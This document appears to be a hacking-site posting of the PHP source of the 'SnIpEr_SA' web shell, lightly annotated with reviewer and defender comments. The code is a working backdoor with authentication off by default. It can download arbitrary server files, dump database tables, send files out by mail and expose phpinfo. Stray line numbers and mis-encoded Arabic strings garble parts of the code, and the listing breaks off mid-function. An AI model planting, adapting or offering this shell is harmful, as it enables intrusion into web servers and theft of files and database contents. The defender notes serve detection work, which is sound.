HackingScripts

Hack Scripts for everybody

SnIpEr_SA Shell

10 Feb 2014

(c)oded by SnIpEr_SA

SnIpEr_SA Shell Source Code

<?php
/******************************************************************************************************/
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*  (c)oded by SnIpEr_SA
/*  MAIL http://sniper-sa.com , http://sniper-sa.com
/******************************************************************************************************/
/*
 * Reviewer summary: opening section of a single-file PHP web shell. It sets the operator
 * options, turns off error reporting, lifts the execution time limit, maps the legacy
 * $HTTP_*_VARS arrays for PHP older than 4.1.0, undoes magic quotes on POST and cookie
 * values, and optionally gates the page behind HTTP Basic authentication.
 * Stable strings in this section that can serve as file or response signatures: the author
 * banner above, the Basic realm "SnIpEr_SA shell", and the "Access Denied" body that links
 * to sniper-sa.com.
 */
/* ~~~ Options ~~~ */
// Interface language
// $language='eng' - english (english)
// $language='ar' - arabi (arabi)
$language='ar';
// Authentication
// $auth = 1; - authentication = On
// $auth = 0; - authentication = Off
// As published the value is 0, so the Basic-auth check below is skipped and the interface is
// served to anyone who can request the file.
$auth = 0;
// Login & password for access. The author's note says "CHANGE THIS!!!" and mentions md5 and
// the word 'sniper'; the rest of that note was lost to mis-encoding.
// NOTE(review): presumably both values are the md5 of 'sniper' - confirm before relying on it.
// Both values are compared below against md5() of the supplied Basic-auth user and password.
$name='1c27680133b781cadd037e8a6dcc001b'; // user login (md5 hex)
$pass='1c27680133b781cadd037e8a6dcc001b'; // user password (md5 hex)
/******************************************************************************************************/
// $copy is not assigned anywhere above this line in the listing.
echo "".htmlspecialchars($copy)."";
// Turn off PHP error reporting for the request.
error_reporting(0);
// Legacy setting: disable runtime magic quotes.
set_magic_quotes_runtime(0);
// Remove the execution time limit and output buffering; each call is @-silenced.
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Read for later use; nothing in this section acts on it.
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
// PHP older than 4.1.0 has no $_POST/$_GET/$_SERVER/$_COOKIE; alias the long-form arrays.
if(version_compare(phpversion(), '4.1.0') == -1)
 {
 $_POST   = &$HTTP_POST_VARS;
 $_GET    = &$HTTP_GET_VARS;
 $_SERVER = &$HTTP_SERVER_VARS;
 $_COOKIE = &$HTTP_COOKIE_VARS;
 }
// When magic_quotes_gpc is on, strip the added backslashes so POST and cookie values are
// used exactly as the client sent them. $_GET is not processed here.
if (@get_magic_quotes_gpc())
 {
 foreach ($_POST as $k=>$v)
  {
  $_POST[$k] = stripslashes($v);
  }
 foreach ($_COOKIE as $k=>$v)
  {
  $_COOKIE[$k] = stripslashes($v);
  }
 }
// Basic-auth gate, evaluated only when $auth == 1. A missing user name, or an md5 mismatch on
// either field, produces a 401 with the realm below and ends the request. The hashes are
// unsalted md5 and the comparison is a plain !==.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
   {
   header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b><a href=http://sniper-sa.com>SnIpEr_SA</a> : Access Denied</b>");
   }
}
// Static page header kept in $head: HTML <head>, the CSS theme and three small JavaScript
// helpers. hide_div()/show_div() toggle an element's display and store the state in a cookie
// named after the element id (value 0 or 1); change_divst() flips between the two.
// The "<!-- SnIpEr_SA -->" marker, the <title> text and the FrontPage generator tags are fixed
// strings, so they can be matched in response bodies or in the file on disk.
// The declared charset is windows-1256.
$head = '<!-- SnIpEr_SA -->
<html>
<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>SnIpEr_SA shell</title>

<STYLE>
BODY
 {
        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}
tr {
BORDER-RIGHT:  #cccccc ;
BORDER-TOP:    #cccccc ;
BORDER-LEFT:   #cccccc ;
BORDER-BOTTOM: #cccccc ;
color: #ffffff;
}
td {
BORDER-RIGHT:  #cccccc ;
BORDER-TOP:    #cccccc ;
BORDER-LEFT:   #cccccc ;
BORDER-BOTTOM: #cccccc ;
color: #cccccc;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #cccccc;
}
table {
BORDER:  #eeeeee  outset;
BACKGROUND-COLOR: #000000;
color: #cccccc;
}
input {
BORDER-RIGHT:  #990000 1 solid;
BORDER-TOP:    #990000 1 solid;
BORDER-LEFT:   #990000 1 solid;
BORDER-BOTTOM: #990000 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT:  #ffffff 1 solid;
BORDER-TOP:    #999999 1 solid;
BORDER-LEFT:   #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #CCCCCC;;
}
submit {
BORDER:  buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #cccccc;
}
textarea {
BORDER-RIGHT:  #ffffff 1 solid;
BORDER-TOP:    #999999 1 solid;
BORDER-LEFT:   #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #cccccc;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>';
// In-memory ZIP archive writer. addFile() appends one deflate-compressed entry; file() returns
// the finished archive as a binary string. Used by compress() below for the 'zip' option.
class zipfile
{
    // Local file header + compressed data, one string per entry.
    var $datasec      = array();
    // Central directory records, one string per entry.
    var $ctrl_dir     = array();
    // End-of-central-directory signature followed by four zero bytes.
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    // Running byte offset of the next local header, written into each central record.
    var $old_offset   = 0;
    // Convert a Unix timestamp (0 = current time) into the packed 32-bit DOS date/time value.
    // Dates before 1980 are clamped to 1980-01-01 00:00:00.
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    // Add one entry.
    //   $data - raw file contents
    //   $name - entry name; backslashes are converted to forward slashes
    //   $time - Unix timestamp for the entry (0 = now)
    function addFile($data, $name, $time = 0)
    {
        $name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        // Build the text '\xNN\xNN\xNN\xNN' from the hex digits in byte-reversed order.
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        // eval() turns that escape text into four raw bytes. Its input is built only from the
        // dechex() digits of the integer timestamp, not from request data. Content scanners that
        // flag any eval( call will still match this line.
        eval('$hexdtime = "' . $hexdtime . '";');
        // Local file header: signature, version 0x14, flags 0, method 8, DOS time.
        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";
        $fr   .= "\x00\x00";
        $fr   .= "\x08\x00";
        $fr   .= $hexdtime;
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        // Drop the first 2 and last 4 bytes of the gzcompress() output before storing it.
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);
        $fr      .= pack('V', $c_len);
        $fr      .= pack('V', $unc_len);
        $fr      .= pack('v', strlen($name));
        $fr      .= pack('v', 0);
        $fr      .= $name;
        $fr .= $zdata;
        $this -> datasec[] = $fr;
        // Central directory record for the same entry, repeating the sizes, CRC and name.
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        // Offset of this entry's local header, then advance the running offset.
        $cdrec .= pack('V', $this -> old_offset );
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }
    // Return the complete archive: all entries, the central directory, and the end record
    // carrying the entry count (twice), the directory size and the directory offset.
    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('V', strlen($ctrldir)) .
            pack('V', strlen($data)) .
            "\x00\x00";
    }
}
// Package a download in the requested format.
//   $filename - by reference; the matching extension (.bz2, .gz, .zip) is appended
//   $filedump - by reference; replaced with the compressed bytes
//   $compress - 'bzip', 'gzip' or 'zip'; any other value leaves the data untouched
// Results are also returned through the globals $mime_type and $content_encoding.
// A format is used only when its PHP function exists; otherwise control falls through to the
// final branch and the data is sent as application/octet-stream.
function compress(&$filename,&$filedump,$compress)
 {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
     {
        $filename  .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
     }
     else if ($compress == 'gzip' && @function_exists('gzencode'))
     {
        $filename  .= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
     }
     else if ($compress == 'zip' && @function_exists('gzcompress'))
     {
             $filename .= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        // The entry inside the archive keeps the original name (the '.zip' just added is cut off).
        $zipfile -> addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile -> file();
     }
     else
     {
             $mime_type = 'application/octet-stream';
     }
 }
// Send one file as a base64 attachment through mail().
//   $to, $from, $subj - recipient, sender and subject
//   $attach           - array read for the keys 'type', 'name' and 'content'
// The whole message, encoded attachment included, is assembled in the header string and the
// body argument is left empty. $from and $attach['name'] are placed in the headers unmodified.
// Returns 1 when mail() accepts the message, 0 otherwise; the call is @-silenced.
// Defender note: this is a data-exfiltration path over the host's mail transport. Outbound
// mail submitted by the web server account is worth correlating with requests to this script.
function mailattach($to,$from,$subj,$attach)
 {
 $headers  = "From: $from\r\n";
 $headers .= "MIME-Version: 1.0\r\n";
 $headers .= "Content-Type: ".$attach['type'];
 $headers .= "; name=\"".$attach['name']."\"\r\n";
 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 if(@mail($to,$subj,"",$headers)) { return 1; }
 return 0;
 }
// Thin multi-driver database client. $db selects the backend ('MySQL', 'MSSQL', 'PostgreSQL'
// or 'Oracle'); every method switches on it and calls the matching legacy PHP extension
// function with errors @-silenced. All connection parameters are plain public properties set
// by the caller.
// Defender note: the class lets the operator connect to any database reachable from the web
// host with credentials they supply, run arbitrary statements and dump whole tables. Database
// connections opened by the web server process to hosts or accounts the application does not
// normally use are the network-side trace of that.
class my_sql
 {
 var $host = 'localhost';
 var $port = '';      // empty means "use the driver default" (filled in by connect())
 var $user = '';
 var $pass = '';
 var $base = '';      // database name
 var $db   = '';      // backend selector, see class comment
 var $connection;     // connection handle returned by the driver
 var $res;            // last statement/result handle
 var $error;          // last error text
 var $rows;           // rows fetched by get_result()
 var $columns;        // column names taken from the first fetched row
 var $num_rows;
 var $num_fields;
 var $dump;           // lines produced by dump()
 // Open a connection for the selected backend. Returns 1 on success, 0 on failure, when the
 // driver function is missing, or when $db is not one of the four known values.
 function connect()
  {
          switch($this->db)
     {
           case 'MySQL':
            if(empty($this->port)) { $this->port = '3306'; }
            if(!function_exists('mysql_connect')) return 0;
            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
            if(is_resource($this->connection)) return 1;
           break;
     case 'MSSQL':
      if(empty($this->port)) { $this->port = '1433'; }
            if(!function_exists('mssql_connect')) return 0;
            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
      if($this->connection) return 1;
     break;
     case 'PostgreSQL':
      if(empty($this->port)) { $this->port = '5432'; }
      // Connection string is assembled by concatenation; values are wrapped in single quotes
      // but not escaped.
      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
      if(!function_exists('pg_connect')) return 0;
      $this->connection = @pg_connect($str);
      if(is_resource($this->connection)) return 1;
     break;
     case 'Oracle':
      if(!function_exists('ocilogon')) return 0;
      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
      if(is_resource($this->connection)) return 1;
     break;
     }
    return 0;
  }
 // Select $this->base on the open connection. PostgreSQL and Oracle always return 1 because
 // the database is chosen at connect time. Returns 0 on failure or unknown backend.
 function select_db()
  {
   switch($this->db)
    {
          case 'MySQL':
           if(@mysql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'MSSQL':
           if(@mssql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'PostgreSQL':
     return 1;
    break;
    case 'Oracle':
     return 1;
    break;
    }
   return 0;
  }
 // Run one statement. Return value: 0 = error ($this->error is set), 1 or 2 = success.
 // For MySQL, 1 means a result resource came back; for MSSQL and PostgreSQL, 1 means the result
 // has more than zero rows; 2 is returned otherwise. The Oracle branch uses the opposite
 // convention (2 when ocirowcount() is non-zero, 1 otherwise).
 function query($query)
  {
   $this->res=$this->error='';
   switch($this->db)
    {
          case 'MySQL':
     // Every MySQL statement is prefixed with a comment that contains a NUL byte. The listing
     // does not say why. The prefix is distinctive if it survives into query logs.
     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
      {
      $this->error = @mysql_error($this->connection);
      return 0;
      }
     else if(is_resource($this->res)) { return 1; }
     return 2;
          break;
    case 'MSSQL':
     if(false===($this->res=@mssql_query($query,$this->connection)))
      {
      $this->error = 'Query error';
      return 0;
      }
      else if(@mssql_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'PostgreSQL':
     if(false===($this->res=@pg_query($this->connection,$query)))
      {
      $this->error = @pg_last_error($this->connection);
      return 0;
      }
      else if(@pg_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'Oracle':
     if(false===($this->res=@ociparse($this->connection,$query)))
      {
      $this->error = 'Query parse error';
      }
     else
      {
      if(@ociexecute($this->res))
       {
       if(@ocirowcount($this->res) != 0) return 2;
       return 1;
       }
      $error = @ocierror();
      $this->error=$error['message'];
      }
    break;
    }
  return 0;
  }
 // Fetch every row of the last result into $this->rows, record the row and field counts, free
 // the result, and take the column names from the first row. Returns 1 when at least one row
 // was counted, else 0.
 // The fetch loops assign into $this->rows[] before testing for false, so the terminating
 // false is stored as the last element of $this->rows.
 function get_result()
  {
   $this->rows=array();
   $this->columns=array();
   $this->num_rows=$this->num_fields=0;
   switch($this->db)
    {
          case 'MySQL':
           $this->num_rows=@mysql_num_rows($this->res);
           $this->num_fields=@mysql_num_fields($this->res);
           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
           @mysql_free_result($this->res);
           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'MSSQL':
           $this->num_rows=@mssql_num_rows($this->res);
           $this->num_fields=@mssql_num_fields($this->res);
           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
           @mssql_free_result($this->res);
           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
    break;
    case 'PostgreSQL':
           $this->num_rows=@pg_num_rows($this->res);
           $this->num_fields=@pg_num_fields($this->res);
           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
           @pg_free_result($this->res);
           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'Oracle':
     // No row-count call here: rows are counted while fetching.
     $this->num_fields=@ocinumcols($this->res);
     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
     @ocifreestatement($this->res);
     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    }
   return 0;
  }
 // Produce a textual dump of one table into $this->dump (an array of lines): a '###' comment
 // header with timestamp, database and table name, then one INSERT statement per row. MySQL
 // additionally emits the SHOW CREATE TABLE output. The Oracle branch only writes a
 // placeholder. Returns 1 on success, 0 on an empty table name, a failed query, an empty
 // result, or an unknown backend.
 // The table name is concatenated into the SQL text as given. Row values go through
 // mysql_real_escape_string() for MySQL and addslashes() for MSSQL and PostgreSQL.
 // Defender note: in database logs this appears as SHOW CREATE TABLE followed directly by an
 // unfiltered SELECT * on the same table (MySQL), or a bare SELECT * FROM <table> (MSSQL,
 // PostgreSQL), issued from the web host.
 function dump($table)
  {
   if(empty($table)) return 0;
   $this->dump=array();
   $this->dump[0] = '
###';
   $this->dump[1] = '
### --------------------------------------- ';
   $this->dump[2] = '
###  Created: '.date ("d/m/Y H:i:s");
   $this->dump[3] = '
### Database: '.$this->base;
   $this->dump[4] = '
###    Table: '.$table;
   $this->dump[5] = '
### --------------------------------------- ';
   switch($this->db)
    {
          case 'MySQL':
           $this->dump[0] = '
### MySQL dump';
           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
           if(!$this->get_result()) return 0;
           $this->dump[] = $this->rows[0]['Create Table'];
     $this->dump[] = '
### --------------------------------------- ';
           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
           if(!$this->get_result()) return 0;
           for($i=0;$i<$this->num_rows;$i++)
            {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
            }
    break;
    case 'MSSQL':
     $this->dump[0] = '
### MSSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
           if(!$this->get_result()) return 0;
           for($i=0;$i<$this->num_rows;$i++)
            {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
            }
    break;
    case 'PostgreSQL':
     $this->dump[0] = '
### PostgreSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
           if(!$this->get_result()) return 0;
           for($i=0;$i<$this->num_rows;$i++)
            {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
            }
    break;
    case 'Oracle':
      $this->dump[0] = '
### ORACLE dump';
      $this->dump[]  = '
### under construction';
    break;
    default:
     return 0;
    break;
    }
   return 1;
  }
 // Close the connection for the selected backend; does nothing for an unknown backend.
 function close()
  {
   switch($this->db)
    {
          case 'MySQL':
           @mysql_close($this->connection);
    break;
    case 'MSSQL':
     @mssql_close($this->connection);
    break;
    case 'PostgreSQL':
     @pg_close($this->connection);
    break;
    case 'Oracle':
     @oci_close($this->connection);
    break;
    }
  }
 // Return the affected-row count reported by the driver for the last statement, or 0 for an
 // unknown backend. Every branch passes $this->res (the statement/result handle).
 // NOTE(review): mysql_affected_rows() normally takes the connection, not a result - confirm.
 function affected_rows()
  {
   switch($this->db)
    {
          case 'MySQL':
           return @mysql_affected_rows($this->res);
    break;
    case 'MSSQL':
     return @mssql_affected_rows($this->res);
    break;
    case 'PostgreSQL':
     return @pg_affected_rows($this->res);
    break;
    case 'Oracle':
     return @ocirowcount($this->res);
    break;
    default:
     return 0;
    break;
    }
  }
 }
// File download action. A POST with cmd=download_file and a non-empty d_name makes the script
// open that path with the PHP process's privileges and return the contents as an attachment.
// The path is used exactly as supplied; no base-directory restriction is visible here, so any
// file readable by the web server account can be retrieved. The optional `compress` field
// selects bzip/gzip/zip packaging through compress().
// On open failure err() is called (defined outside this part of the listing) and cmd is cleared.
// Defender note: request bodies carrying cmd=download_file together with d_name, and
// attachment responses from a script that is not a known application endpoint, are the
// observable trace of this branch.
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 {
  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  else
   {
    // Discard anything already buffered so only the file bytes are sent.
    @ob_clean();
    $filename = @basename($_POST['d_name']);
    $filedump = @fread($file,@filesize($_POST['d_name']));
    fclose($file);
    $content_encoding=$mime_type='';
    compress($filename,$filedump,$_POST['compress']);
    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
    header("Content-type: ".$mime_type);
    header("Content-disposition: attachment; filename=\"".$filename."\";");
    echo $filedump;
    exit();
   }
 }
// Any request with a `phpinfo` query parameter prints the full phpinfo() page (PHP version,
// loaded modules, environment and configuration values) plus a BACK link, then stops.
// $_SERVER['PHP_SELF'] is written into the link without escaping.
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
 569 if(isset($_GET['sqlman'])) {
 570 session_start();
 571 $action = $HTTP_GET_VARS['action'];
 572 $pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page.
// Print the database login form: host, user id, password and, when $dbnamearray is not the
// empty string, a drop-down of database names.
// $action is not a parameter and is not imported with `global`, so inside this function it is
// an unset local and the form's action attribute is rendered empty.
// $hostdefault is a string, so the count() > 1 branch (a host drop-down) looks unreachable as
// written - NOTE(review): confirm against the PHP version in use.
// Values are written into the HTML unescaped and, for option/value attributes, unquoted.
function show_login($dbnamearray){
     $hostdefault="localhost";
                echo"<table>";
                echo"<form  name='showlogin' method='post' action='$action'>";
        if(count($hostdefault) > 1){
            echo"<tr><td>??? C???????:</td><td><select name=host>";
            for($x=0; $x < count($hostdefault);$x++){
                echo"<option value=$hostdefault[$x]>$hostdefault[$x]";
            }
            echo"</select></td></tr>\n";
        }else{
            echo"<tr><td>????? ????? ????????:</td><td><input type=text name='host' size=15 value=$hostdefault /></td></tr>\n";
                }
        echo"<tr><td>??? ????????:</td><td><input type=text name='userid' size=15 /></td></tr>\n";
                echo"<tr><td>???? ??????:</td><td><input type=password name='pword1' size=15 /></td></tr>\n";
                If($dbnamearray != ""){
                        echo"<tr><td>?C?IE C?E?C?CE:</td><td><select name='dbna'>\n";
                        for ($i =0; $i < count($dbnamearray); $i++) {
                                $dbn=$dbnamearray[$i];
                                echo"<option value=$dbn>$dbn";
                        }
                }
                echo"<tr><td><input class=ser type='submit' name='login' value='????' /></td>\n";
                echo"<td><input class=ser type=reset name='reset' value='???' /></td></tr>\n";
                echo"</form></table>\n";
}
// Return the list of database names the logged-in session user may see.
// A user matching a hard-coded case gets that case's fixed list (the only case present is the
// '**User**' placeholder). Every other user falls to `default`, which flags the session with
// 'defaltuser' and enumerates every database the MySQL account can list.
// When $_SESSION['user'] is not set the function returns nothing.
function dbrestrict(){
if(isset($_SESSION['user'])){
    $user=$_SESSION['user'];
    switch($user){
    //Edit these ** values. You can add more case statements.
        case '**User**':
            $dbnamearray= array('**dbname**', '**dbname2**', '**dbname**');
            break;
     //end edit values
        default:
            $_SESSION['defaltuser']=true;
            $dbnamearray = array();
            $link = connectmysql();
            $db_list = mysql_list_dbs($link); //$db_list
                    $cnt = mysql_num_rows($db_list);
                    for ($i =0; $i < $cnt; $i++) {
                            $dbnamearray[$i]= mysql_db_name($db_list, $i);
                    }
    }
    return $dbnamearray;
}
}
 621 //***************************************************************
 622 //function showdbs($dbnamearray, $backuppath){
// Print a table with one row per database: a button (via goto()) that posts the database name
// under the field 'db', and the value returned by mysize() for that database.
// mysize() is not defined in the visible part of the listing.
// $action is an unset local here, so an empty action is passed to goto().
function showdbs($dbnamearray){
    //$backuppath=addslashes($backuppath);
       echo"<table>\n";
       for ($i =0; $i < count($dbnamearray); $i++) {
                    echo"<tr><td>";
            $dbn=$dbnamearray[$i];
                        $va="?????? ??? ????? $dbn";
                        goto(' ', $dbn,$action, 'but', 'db', $va );
            $dbs=mysize($dbnamearray[$i],"");
            echo"</td><td>$dbs</td></tr>\n";
        }
    echo"</table>\n";
}
 636 
 637 //********************* Show Logout Button **********
// Print the logout form: a single submit button named 'logout'.
// $action is an unset local here, so the form's action attribute is rendered empty.
function endsess(){
echo"<form method='post' name='endsess' action='$action'>\n";
echo"<input class=ser type='submit' name='logout' value='????' />\n";
echo"</form>";
}
 643 //********************************************************************
// Open a MySQL connection using the host, user and password held in the PHP session.
// Returns the link on success and false on failure, after printing an error block that
// includes the host and user name. When the session holds no user or password the page
// footer is printed and the request ends.
// Defender note: the database credentials the operator typed are kept in server-side session
// storage, so session files on a host where this script ran may contain them.
function connectmysql(){
        //Connects to the MySQL Database.

        if (isset($_SESSION['user']) && isset($_SESSION['password'])){
                 $user = $_SESSION['user'];
                 $pass = $_SESSION['password'];
        }else{
        // display_foot() is not defined in the visible part of the listing.
        display_foot();
        echo"\n</body>\n</html>";
                exit();
        }
        $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']);
        if(! $link){
                echo"<div class='error'>\n";
                echo"Unable to connect to the database server. <BR>";
                echo"The Host: $_SESSION[host], ??? ????????: $user ?? ?????? ?????? ????. <br>";
                echo"????? ??? ???? ???????? ??? ????.\n";
                echo"</div>\n";
        return false;
                // Unreachable: follows the return above.
                exit();
        } else{
                return $link;
        }
}
 668 //*********************************************************************
// Select database $db on the open link. On failure print a message naming the database
// (unescaped) and end the request. Returns nothing.
function connectdb($db, $link){
        if(! mysql_select_db($db,$link)){
                echo"Unable to locate database $db.<br> Please try again later.\n";
                exit();
        }
}
 675 //*********************************************************************
// Run $sql on the current default MySQL connection. Returns the result on success; on failure
// prints the statement and the server's error text (both unescaped) and returns false.
// $tablename and $db are accepted but not used in the body.
function exequery($sql, $tablename, $db){
        $result= @mysql_query( $sql );
        if($result){
                //echo "Query successful";
                return $result;
        }else{
                echo"Sorry your Query failed: $sql <br> error:".mysql_error()."\n";
                return false;
        }
}
 686 
 687 //***************************************************
// MySQL column type names in alphabetical order. Not referenced in the visible part of the
// listing; presumably used by a table-editing form further down - TODO confirm.
$fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT",
  "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION",
 "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" );
 691 
 692 //****************** Search Form ****************************
// Print the search form for one table: hidden dbname and tablename fields, a free-text
// 'searchval' input and a submit button named 'search'.
// $dbname and $tablename are written into the attributes unescaped; $action is an unset local,
// so the form's action attribute is rendered empty.
function searchtableform($tablename, $dbname){
        echo"<form method='post' action='$action'>\n";
        echo"<input type=hidden name='dbname' value='$dbname' />\n";
        echo"<input type=hidden name='tablename' value='$tablename' />\n";
        echo"<input type=text name='searchval' />\n";
        echo"<input class=ser type=submit name='search' value='Search $tablename' />\n";
        echo"</form>\n";
}
 701 //********************* Search *************************
// Search every column of $tablename for each space-separated word in $searchval and return the
// result of the combined query. Returns nothing when $searchval is empty.
// A first SELECT * is run only to learn the number of fields. The WHERE clause is then built
// as "<field> like '%word%' or ..." for every word/field pair, and the trailing "or " is
// trimmed off before the final query runs.
// Table name, field names and search words are concatenated into the SQL text without
// escaping. In query logs this shows up as a SELECT * with a LIKE term on every column.
function searcht($tablename, $dbname, $searchval){
        if(! empty($searchval)){
                //        $searchval= str_replace(";",' ', $searchval);
        $result=exequery("Select * from $tablename", $tablename, $dbname);
